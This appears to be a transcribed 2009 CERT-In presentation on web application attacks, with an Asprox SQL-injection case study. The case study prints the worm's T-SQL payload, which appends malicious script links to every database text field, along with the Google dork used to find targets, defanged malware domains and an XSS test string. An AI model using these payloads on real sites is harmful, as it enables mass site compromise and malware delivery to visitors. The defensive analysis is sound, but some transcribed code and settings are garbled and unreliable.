Understanding Web Application Security Issues

Transcription

1 Understanding Web Application Security Issues Pankaj Sharma January 30, 2009 Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1

2 Agenda Introduction What are Web Applications? Three-layered web application model. Secure Architecture & Threats Statistics of Application attacks in 2008 (April,May,June) Case Study Asprox Refrences Q&A 2

3 Web Applications? A web application is a program developed to perform a specific function directly for the user or for another application program. Web applications include code that resides on the Web servers, application servers, databases, and backend systems of an organization. Client/Server Software HTTP /HTTPS Browser Web Server 3

4 Three-layered web application model The first layer is normally a web browser or the user interface The second layer is the content generation technology tool such as Java servlets (JSP) or Active Server Pages (ASP), Third layer is the company database containing content (e.g., news) and customer data (e.g., usernames and passwords, social security numbers and credit card details). 4

5 Statistics of defacement in march 2008 In total 612 Indian websites were defaced during March

6 Vulnerabilities exploited for the defacements Multiple Vulnerabilities in Apache HTTP Server CIAD Cross Site Scripting Vulnerability in Apache mod_imap Module CIVN Apache Tomcat SingleSignOn Cookie Information Disclosure Weakness CVE phpmyadmin Local Information Disclosure CVE Apache Tomcat AJP Connector Information Disclosure CVE Apache Tomcat Cross-Site Scripting CVE

7 Attack Trend Mass SQL Injection attacks and malicious Java script embedding on websites (March,April, May 2008) Various websites have been infected with malicious JavaScript file (f**kjp DOT js) ). Remote attackers are launching a SQL injection attacks against web servers running ASP and embedding a link (www DOT DOT net/f**kjp DOT js) to malicious JavaScript file on these websites. When a user visits the infected websites, the code gets executed onto the user's system. Upon execution it tries to exploit several known vulnerabilities on the victim system to download some password stealing malware. The downloaded malware tries to make outbound connections to IP address 61 DOT 188 DOT 39 DOT 175 on port

8 Attack Trend It has also been reported that mass attacks were launched against websites running phpbb(php Bulletin Board ) through IFrame Injection redirecting innocent users to malicious websites. 8

9 Attack Trend Subsequently mass IFrame and JavaScript injection attacks have been reported using malicious domains. www DOT nmidahena DOT com www DOT nihaorr1 DOT com, www DOT aspder DOT com, haoliuliang DOT net, winzipices DOT cn, yl18 DOT net, www DOT bluell DOT cn, www DOT kisswow DOT com DOT cn, www DOT ririwow DOT cn, hxxp://updatead DOT com, hxxp://upgradead DOT com, hxxp://clsiduser DOT com and hxxp://dbdomaine DOT com. 9

10 Vulnerabilities exploited by the JavaScript file Microsoft Data Access Components Code Execution Vulnerability (CIVN ) Microsoft Windows Vector Markup Language Code Execution Vulnerability (CIVN ) Microsoft Internet Explorer "daxctle.ocx" KeyFrame Memory Vulnerability. (CIVN ) Microsoft Internet Explorer WebViewFolderIcon Buffer Overflow Vulnerability (CIVN ) RealPlayer Playlist Buffer overflow Vulnerability (CIVN ) 10

11 Countermeasures from CERT-In Enable request validation by setting validaterequest=truefalse in the Page directive or in the configuration section. Input Filtering: Properly sanitize user input data. Comment out malicious code: any scripting content to be safely commented out. Avoid cross-site scripting appending in URLs by using some special character like #,etc alert(document.cookie)<script> Output Filtering: Filter user data when it is sent back to the user s browser. Disable client side scripting. Use Signed Scripting: Implement signed scripting such that any script with an invalid or un-trusted signature would not run automatically. 11

12 Other Countermeasures Microsoft has released an advisory on June 24, 2008 suggesting steps to mitigate the risk from SQL Injection attack on websites running ASP.Net. For details refer to Microsoft Advisory : mspx A free scanner named Scrawlr has been developed by Hewlett Packard which can identify whether sites are susceptible to SQL injection. This tool and support for its use can be found at: gs/ spilabs/archive/2008/06/23/finding-sql-injection-withscrawlr. aspx 12

13 Statistics of defacement in June,2008 In total 342 Indian websites were defaced during June

14 Vulnerabilities exploited for the defacements Apache-SSL Authentication Bypass Vulnerability CIVN phpmyadmin Shared Host Remote Information Disclosure CVE Apache Tomcat SingleSignOn Cookie Information Disclosure Weakness CVE phpmyadmin Local Information Disclosure CVE Apache Tomcat Cross-Site Scripting CVE

15 Attack Trend SQL Injection Worm (April,May,June 2008) SQL Injection Worm spreading in the wild by injecting java scripts or iframe into websites. The Asprox botnet is also launching the SQL Injection attacks. 15

16 Attack Trend Many websites have been found infected with such scripts. 16

17 Attack Trend Websites injected with java scripts are redirecting innocent visitors to malicious website winzipices DOT cn which is containing java scripts with numeric names such as 2.js, 4.js. 17

18 Attack Trend The SQL injection worm is seems to be infecting machines using vulnerable Real Player versions. Malicious domains involved in attacks with SQL worm activity are cnzz DOT com, 51 DOT la, 51la DOT ajiang DOT net, and bbs DOT jueduizuan DOT com 18

19 Case Study(asprox) The Database Security and vulnerability Analysis Team of CERT-In thoroughly analyzed the attack and identified the vulnerabilities which were being exploited to compromise the website. After compromising the website, the attacker used the compromised host for further attacks over the internet. 19

20 Case Study(asprox) Environment: Operating system: Windows Server Web server: IIS Web application: ASP Method GET 20

21 Case Study (asprox) Investigation it was observed this SQL Injection attack carried out on IIS web server sites that ran with SQL Server as backend. Tool used to attack A sophisticated tool is used to scan the entire web for potentially weak sites running ASP.Net.This tool is called Danmec/Asprox SQL Injection Attack Tool. 21

22 Case Study (asprox) Asprox Asprox initiate Google queries searching for vulnerable ASP sites with the following query string: inurl:.asp inurl: a=. Parse the results and initiate the SQL injection attack Inject malicious JavaScript links into the back-end MS-SQL server database. If this is successful, the website will display the malicious JavaScript links in its output to clients. These links will force the user s browser to download other JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user credentials. 22

23 Case Study (asprox) 23

24 Case Study (asprox) The attacker then the load the query string with encoded T-SQL. 24

25 Case Study (asprox) The input encoded T-SQL would look like: GET /home/vulnerable_site.asp D B D003D B C D003D D0 02B B B E006E D B D B B E006E D B D003D D F006E C B E006E D B B C D A002F002F C E006E F E006A E003C002F E B F006D F002E F A C F002E F006C D006E C F002E E D E E E D E E D E E E006E D D B D003D D B D003D E D002C E B C D C B D003D D B D B0 25

26 Case Study (asprox) After decoding the SQL code looked like: varchar(8000); select src=" from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='u' and b.xtype=c.xtype and c.name='varchar'; This SQL code would find all the fields with type VARCHAR from a JOIN between the sysobjects, syscolumns and systypes system tables in the databasethis SQL statement takes all rows from the sysobjects table with type U (user table). It then matches those objects with type varchar. Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site. 26

27 Case Study (asprox) Another variation of the same type of SQL code is given below with a link to the JavaScript file 1.js. varchar(255); DECLARE Table_Cursor CURSOR FORSELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM WHILE (@@FETCH_STATUS = 0) BEGIN EXEC('update [' + '] set [' + '] = rtrim(convert(varchar,[' + ']))+ ''<script src= FETCH NEXT FROM END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; 27

28 Case Study (asprox) The above SQL code uses table cursors to enumerate all tables on MS SQL server and the respective columns that are of type ntext, text, nvarchar, or varchar and the table type is a user table and not a system table. The code then proceeds to utilize a cursor while loop to iterate through the returned results updating each table.columname concatenating it's current value with an arbitrary value. The code converts the current data to varchar during concatenation to avoid any cast issues and removes any trailing space to the right of the field value. The cursor is deallocated after update. So finally it finds all text fields in the database and adds a link to malicious JavaScript file to each field. These JavaScript files links will force the user s browser to download other JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user credentials. 28

29 Identification Case Study (asprox) Identification of Attack Identification requires that database administrators (DBA) review all databases providing services to web applications. Review access controls and privileges granted to web application accounts. Privileges should not exceed those specified by the application owner. Look for the presence of unexpected HTML tags in records of the database related with the application. These unexpected HTML tags in application table records may be an indicator that the online service has been compromised and that immediate action is required. 29

30 Identification Case Study (asprox) Web Administrators should review server-side components of online services which access databases. Identify online service components with insufficient validation controls. Validation controls ensure the data conforms to the expected format, size and value. Identify online service components which allow, or are vulnerable to, improper data conversions. Data must be converted to its simplest form prior to being accepted for further processing. 30

31 Containment and Eradication (Case Study ) The following actions can be taken to mitigate the security risk: Shutdown the service until the system will recover fully from the attack. Validate the account that are used from the web application have least possible privilege in the database Implement strict database access controls to restrict online services to read only access; Implement filters that will convert dangerous data into an inoffensive form;(replace all unwanted html tags if any from the databases) Put the database offline or recover clean data from a backup. Monitoring tools for Web and Database server should be deployed. 31

32 Recommendations for Web developers Review the security of web application Review of online services security Review of network security Review IIS logs and database tables for signs of previous exploits Review of database security; Perform Vulnerability testing using specialized tools for online services, network and database security. Implement Application security best practices 32

33 Recommendation for Database Administrators Do security audit all databases used by web servers. DBA should particularly check for: The presence of unexpected HTML tags Database Administrators should search all tables for the presence of unexpected HTML tags such as: SCRIPT IFRAME FRAME 33

34 Recommendation for Database Administrators Review Access controls and privileges for web application. Review privileges to the following: SQL Statements SELECT, GRANT,, UPDATE, DELETE, GRANT etc. Data definition language elements (CREATE, ALTER etc.) Stored procedures 34

35 Secure Architecture 35

36 References

37 Thanks 37